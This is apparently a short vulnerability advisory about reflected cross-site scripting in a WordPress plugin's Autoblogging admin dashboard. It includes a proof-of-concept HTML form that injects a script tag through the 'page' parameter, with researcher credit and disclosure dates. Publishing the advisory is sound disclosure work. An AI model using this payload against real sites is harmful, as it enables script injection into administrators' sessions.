The plugin does not sanitise and escape the page parameter before outputting back in an attribute in the Autoblogging admin dashboard, leading to a Reflected Cross-Site Scripting
<html> <form action="https://example.com/wp-admin/admin.php?page=content-egg-autoblog" method="POST"> <input type="text" name="page" value='"><script>alert(/XSS/);</script>'> <input type="submit" value="Send"> </form> </html>
Krzysztof Zając
Krzysztof Zając
Yes
2022-04-06 (about 2 months ago)
2022-04-06 (about 2 months ago)
2022-04-13 (about 2 months ago)